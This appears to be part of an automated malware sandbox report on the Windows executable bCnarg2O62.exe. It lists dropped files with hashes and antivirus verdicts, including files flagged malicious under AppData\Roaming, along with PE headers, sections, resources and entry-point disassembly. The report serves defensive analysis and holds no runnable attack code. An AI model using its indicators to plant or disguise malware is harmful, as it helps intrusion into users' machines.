                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\DDC3.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                      Category:dropped
                                                                                                      Size (bytes):28672
                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\DF4B.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\E0D2.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49152
                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\E19E.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):114688
                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Roaming\derhswe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.34706850547879
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:dBc5/Qqguk5r/EaOKIhfzrIqku/a5J0gToyxw7coy6BbO42Tn:MBQqgoampv1/GJ0gThx8NO4O
                                                                                                      MD5:FA949A7589DC71EA006EB10AD025618A
                                                                                                      SHA1:3525508CC8B83CDEC2BDE0BF0CBDC7CDAB62C383
                                                                                                      SHA-256:FFF79A1E96FFCAC77B3EB7BC01706BFECE7499AB8972B28A732DFA2AA09994EE
                                                                                                      SHA-512:40734414F0D40431625D1C79F7FC043458DE0F73B59764239041F6A7AC959A6E11869F45A334FEC45F37267BF9C2FF2CA4ACC23DB9C5EAC0E70E9413307DB136
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L......e.............................;............@................................."....................................... ...P...................................p...................................@............................................text............................... ..`.rdata..............................@..@.data............`..................@....siy................................@..@.fitecos............................@..@.darulet............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Roaming\derhswe:Zone.Identifier

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                      C:\Users\user\AppData\Roaming\hbtujbr

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):290443
                                                                                                      Entropy (8bit):7.999354805405584
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:DK8qz437ZHZt5G0/3tBM4tuG6LfimzeXLhoNx2HFOJGgFQSU031/Hp:uLc37Z5bG01BR4h6mzILhoNclO4j0l/J
                                                                                                      MD5:F8A515527C7555F64CBECC59E38CC8EE
                                                                                                      SHA1:A379401E41B9089D6AB10899491DA3119C5CD5DB
                                                                                                      SHA-256:77226CD69B16B6012035EBE839310D51F09C54B7F7D3A24BF48405CDC30B77F1
                                                                                                      SHA-512:354CFF85F0A1C604EC28500A4D6E709E7FEE30DBB0DC17E23D4EE83243AF63AEFEDF464727026EF6CECC0DDA4E2035BB510AE40F45CFD9448CB29AC40518E9C1
                                                                                                      Malicious:false
                                                                                                      Preview:.hl.l....HtD...V^X.l(C,.YV..l.5.6q....&.1.qk...)=..+c.`..........>..#..]..{=.~t.I.:../;.BC.!..q.f....v.kO`...;.......~.a.D1......l0yY....DRM.;...q?..}..3.l..s.Ix........r...A..\..8*../..N!.E.p.Zp....N.I..8.......... ...i.T..X.Q3.|=..w..{1K.....C..d..e,o.MT...,.Q..Q.R...r.....r*..T..;k.-...U...a...7.;.,....f`.7...J>..J..s.!-b..H.@..yq.|<.>1..5.p'...\_7@.f...5P$......'....gF...f.O..a..z.@........19....W?+C.....|..j`.+|K..._..p.014E..)x............;.3.!..8......=jP...k...V.p4 ....*..q..%:.to..L..t.,Y.\l..K.]j.....g...r.!.S....3.-iU..J..+.....>.13..}m....?ly.W..m.DF...v\...O...r.X..{.1..qq..8.s.0BO...k..q..Ar..".6B..y.......c....0J..E.>.....j...y.$.Q?oj......@7?......'....j&.p...........[w..c.=...... :.....iv..+...#....V...P...."@........"..k.s....S.4.;..E*:2.C..T.`&.i....v....g....fMd..U...t.a.k.%P..P?..:.>........N..u...D../....H..t..G.k:.).V.O4........Bc.a....}. .U..\n&Z..V.<...|.ad.p..,.6.E..2...Q6(a.%Q....H..:ps..qtN.D~.r.d....g!.].W..

                                                                                                      C:\Users\user\AppData\Roaming\jfrhswe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.3528472110057015
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:rBS3kQBgyTmD60mDGMiH64vt3ro87JKn6+hNtzRUpy6BbO42Tn:YUQBgyXGMslJKnv2NO4O
                                                                                                      MD5:02F50094664F74B387AC57B1DE8679AF
                                                                                                      SHA1:E4DC28C4D8FD6C9010CA95B978133B46CAC5148E
                                                                                                      SHA-256:A9276BC533A2BB42308613EAF590FD97F662E81A4C4F1A1BE43709AE3B923432
                                                                                                      SHA-512:DE298772E5232A547BF7DDCDC45EF9A84BAF46911994D80E93F9F75CD00EE1EA474892AF98C82FD96E343F7A858A3627C39E22E2D17496C13A81950B86F72895
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L....cd.............................;............@..................................o..........................................P...................................0...............................h...@............................................text............................... ..`.rdata..............................@..@.data............`..................@....xexolu.............................@..@.naxurew............................@..@.havi...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.34706850547879
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:bCnarg2O62.exe
                                                                                                      File size:453'632 bytes
                                                                                                      MD5:fa949a7589dc71ea006eb10ad025618a
                                                                                                      SHA1:3525508cc8b83cdec2bde0bf0cbdc7cdab62c383
                                                                                                      SHA256:fff79a1e96ffcac77b3eb7bc01706bfece7499ab8972b28a732dfa2aa09994ee
                                                                                                      SHA512:40734414f0d40431625d1c79f7fc043458de0f73b59764239041f6a7ac959a6e11869f45a334fec45f37267bf9c2ff2ca4acc23db9c5eac0e70e9413307db136
                                                                                                      SSDEEP:6144:dBc5/Qqguk5r/EaOKIhfzrIqku/a5J0gToyxw7coy6BbO42Tn:MBQqgoampv1/GJ0gThx8NO4O
                                                                                                      TLSH:3CA4C00252D9FEA0F5E64A339D1EFAF8A52DFC51DE586757325C2B1F1B702A1C222720
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L......e...

                                                                                                      File Icon

                                                                                                      Icon Hash:55255145494d610d

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x403bb9
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x65C7B3C1 [Sat Feb 10 17:34:57 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:e40ec87d26b2fdb6278430b22f5c1df6

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007FA8E0F2E149h
                                                                                                      jmp 00007FA8E0F2B09Eh
                                                                                                      push dword ptr [00451258h]
                                                                                                      call dword ptr [0040F10Ch]
                                                                                                      test eax, eax
                                                                                                      je 00007FA8E0F2B214h
                                                                                                      call eax
                                                                                                      push 00000019h
                                                                                                      call 00007FA8E0F2DA2Bh
                                                                                                      push 00000001h
                                                                                                      push 00000000h
                                                                                                      call 00007FA8E0F2A9D0h
                                                                                                      add esp, 0Ch
                                                                                                      jmp 00007FA8E0F2A995h
                                                                                                      mov edi, edi
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 20h
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      push 00000008h
                                                                                                      pop ecx
                                                                                                      mov esi, 0040F3B0h
                                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                                      rep movsd
                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                      pop edi
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      pop esi
                                                                                                      test eax, eax
                                                                                                      je 00007FA8E0F2B21Eh
                                                                                                      test byte ptr [eax], 00000008h
                                                                                                      je 00007FA8E0F2B219h
                                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      push eax
                                                                                                      push dword ptr [ebp-10h]
                                                                                                      push dword ptr [ebp-1Ch]
                                                                                                      push dword ptr [ebp-20h]
                                                                                                      call dword ptr [0040F140h]
                                                                                                      leave
                                                                                                      retn 0008h
                                                                                                      mov edi, edi
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push ecx
                                                                                                      push ebx
                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                      add eax, 0Ch
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      mov ebx, dword ptr fs:[00000000h]
                                                                                                      mov eax, dword ptr [ebx]
                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ebx, dword ptr [ebp+0Ch]
                                                                                                      mov ebp, dword ptr [ebp-04h]
                                                                                                      mov esp, dword ptr [ebx-04h]
                                                                                                      jmp eax
                                                                                                      pop ebx
                                                                                                      leave
                                                                                                      retn 0008h
                                                                                                      pop eax
                                                                                                      pop ecx
                                                                                                      xchg dword ptr [esp], eax
                                                                                                      jmp eax
                                                                                                      pop eax
                                                                                                      pop ecx
                                                                                                      xchg dword ptr [esp], eax
                                                                                                      jmp eax
                                                                                                      pop eax
                                                                                                      pop ecx
                                                                                                      xchg dword ptr [esp], eax
                                                                                                      jmp eax

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [ASM] VS2010 build 30319
                                                                                                      • [C++] VS2010 build 30319
                                                                                                      • [ C ] VS2010 build 30319
                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                      • [RES] VS2010 build 30319
                                                                                                      • [LNK] VS2010 build 30319

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x49b200x50.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f100.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x49b700x1c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x490b00x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1e0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xd49d0xd60049618baca108ff28b4ba0a6755ccbb34False0.6013799649532711data6.6672590284458435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xf0000x3b5f80x3b6005dc072fda94cb2cc79ac90b7d780b362False0.7532483552631579data6.877195715683228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x4b0000x11cc00x6000971d14af5ed905b6c288d4e05e9f40d8False0.08402506510416667data1.0916502474597252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .siy0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .fitecos0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .darulet0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x600000x1f1000x1f200d8fc0635499f120e8c013fdaf1aa57c3False0.4249027359437751data5.013871580597741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                      RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                                      RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                      RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                      RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                      RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                                      RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                                      RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                                      RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                                                                                      RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                                                                                      RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                                                                                      RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                                                                                      RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                                                                                      RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                                                                                      RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                                                                                      RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                                                                                      RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                                                                                      RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                                                                                      RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                                                                                      RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                                                                                      RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                                                                                      RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                                                                                      RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5660980810234542
                                                                                                      RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5660980810234542
                                                                                                      RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5482851985559567
                                                                                                      RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5482851985559567
                                                                                                      RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.615606936416185
                                                                                                      RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.615606936416185
                                                                                                      RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4636929460580913
                                                                                                      RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4636929460580913
                                                                                                      RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4880393996247655
                                                                                                      RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4880393996247655
                                                                                                      RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4930327868852459
                                                                                                      RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4930327868852459
                                                                                                      RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4530141843971631
                                                                                                      RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4530141843971631
                                                                                                      RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3784648187633262
                                                                                                      RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3784648187633262
                                                                                                      RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5058664259927798
                                                                                                      RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5058664259927798
                                                                                                      RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5599078341013825
                                                                                                      RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5599078341013825
                                                                                                      RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.583092485549133
                                                                                                      RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.583092485549133
                                                                                                      RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                                                                                      RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                                                                                      RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.41228893058161353
                                                                                                      RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.41228893058161353
                                                                                                      RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.40081967213114755
                                                                                                      RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.40081967213114755
                                                                                                      RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.46897163120567376
                                                                                                      RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.46897163120567376
                                                                                                      RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3742004264392324
                                                                                                      RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3742004264392324
                                                                                                      RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5171480144404332
                                                                                                      RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                                                                                                      RT_DIALOG0x7dc280x58data0.8977272727272727
                                                                                                      RT_STRING0x7dc800x2c6dataTamilIndia0.4830985915492958
                                                                                                      RT_STRING0x7dc800x2c6dataTamilSri Lanka0.4830985915492958
                                                                                                      RT_STRING0x7df480x6b4dataTamilIndia0.42657342657342656
